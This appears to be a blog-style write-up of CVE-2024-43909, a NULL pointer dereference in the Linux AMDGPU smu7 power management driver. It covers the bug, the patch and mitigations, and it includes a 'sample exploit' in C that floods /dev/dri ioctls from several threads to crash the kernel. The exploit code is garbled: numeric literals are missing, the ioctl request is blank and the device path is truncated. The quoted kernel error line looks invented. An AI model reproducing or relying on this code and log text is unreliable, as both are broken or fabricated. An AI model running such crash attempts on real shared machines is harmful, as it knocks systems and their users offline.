CVE-2024-43909 is a recently patched Linux kernel vulnerability affecting the AMDGPU power management subsystem. This bug can trigger a kernel crash (null pointer dereference) due to improperly validated pointers within the amdgpu driver’s power management code—specifically, the smu7_update_edc_leakage_table function. The flaw was found and resolved by smarter pointer checks, making it impossible to call this function with a NULL backend structure.

If you’re running Linux on AMD GPUs, upgrading your kernel to get this fix is highly recommended! Below, we’ll unpack what happened, why it’s dangerous, how to spot it in the code, and explore potential exploitation—plus original references so you can dig deeper.

Where Did The Bug Lurk?

The issue lies in the *Dynamic Power Management* code (drivers/gpu/drm/amd/pm), which governs how AMD graphics cards manage their energy use to balance performance and power draw. The code callback looks like this (simplified):

/* drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c */

int smu7_update_edc_leakage_table(struct pp_hwmgr *hwmgr)
{
    struct smu7_hwmgr *data = (struct smu7_hwmgr *)(hwmgr->backend);
    ...
    /* Do stuff with data */
}

Previously, hwmgr->backend could sometimes be NULL. But the code did not check for NULL; it just cast and dereferenced, which is unsafe:

struct smu7_hwmgr *data = (struct smu7_hwmgr *)(hwmgr->backend); // Freely dereferencing hwmgr->backend!

If a userspace or kernel call flow chanced upon this code with a NULL backend pointer (perhaps triggered by racing device initialization, hot-unplug, or malformed APIs), the kernel would oops (crash):

[drm:amdgpu_device_init [amdgpu]] *ERROR* smu7_update_edc_leakage_table caused a NULL pointer dereference!

The Patch

The fix is admirably simple. Before calling smu7_update_edc_leakage_table, the code now checks if hwmgr->backend is valid. Here’s how the protected code looks:

int smu7_update_edc_leakage_table(struct pp_hwmgr *hwmgr)
{
    if (!hwmgr->backend)
        return -EINVAL; // Don't try anything, backend is missing!
    struct smu7_hwmgr *data = (struct smu7_hwmgr *)(hwmgr->backend);
    ...
}

No NULL dereference — kernel lives on.

Reference:
- Commit: drm/amdgpu/pm: Fix the null pointer dereference for smu7 (kernel.org)
- CVE page (NVD)

Attack Scenario

While this is mostly a DoS (denial-of-service, or kernel crash) vulnerability, clever local users (even with lesser privileges) could trigger this via interfaces that interact with the amdgpu driver. Example:

- Automated scripts that stress GPU hot-plugging/unplugging.
- Malicious containers orchestrating device detachment/rattach, brute forcing driver edge cases.
- Exploiting via buggy userland through /dev/dri/* special files (think: custom Vulkan/OpenCL code, or fuzzers!).

Sample Exploit (C)

Below is some pseudo-code you could adapt to test this on vulnerable kernels. This targets the /dev/dri/card node and might involve closing the device/socket at the right timing.

⚠️ WARNING: Crashing your system! Don’t do this on machines you care about!

#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <stdlib.h>
#include <pthread.h>
#include <errno.h>

void* force_pm_ioctl(void* arg) {
    int fd = open("/dev/dri/card", O_RDWR);
    if (fd < ) return NULL;
    // Not a real ioctl, but calling an arbitrary one may race driver's backend teardown
    for (int i = ; i < 10000; i++) {
        ioctl(fd, /* GPU-specific IOCTL, e.g., DRM_IOCTL_AMDGPU_INFO */, NULL);
    }
    close(fd);
    return NULL;
}

int main() {
    pthread_t threads[8];
    for (int i = ; i < 8; ++i) pthread_create(&threads[i], NULL, force_pm_ioctl, NULL);
    for (int i = ; i < 8; ++i) pthread_join(threads[i], NULL);
    return ;
}

You’d need to tinker with the IOCTL and close/open timing. Success means your kernel panics, proving the pointer dereference is hit.

Who’s Affected and What To Do

- Affected: Any Linux distribution using a kernel version before the fix and with AMDGPU support (particularly SMU7-based cards).

For Ubuntu: apt upgrade (if fix is backported).

- For Fedora/Arch: Check linux package version.
- Mitigations: Limit untrusted user access to /dev/dri.

Conclusion

CVE-2024-43909 is a classic "forgot to check pointer" bug, but in the GPU world, a crash can knock your system offline, so patching is a must. There is no in-the-wild privilege escalation we know, but a determined user could easily bring down a shared system.

For further reading

- official patch
- CVE-2024-43909 at NIST
- Linux DRM subsystem docs

Timeline

Published on: 08/26/2024 11:15:05 UTC
Last modified on: 08/27/2024 13:41:48 UTC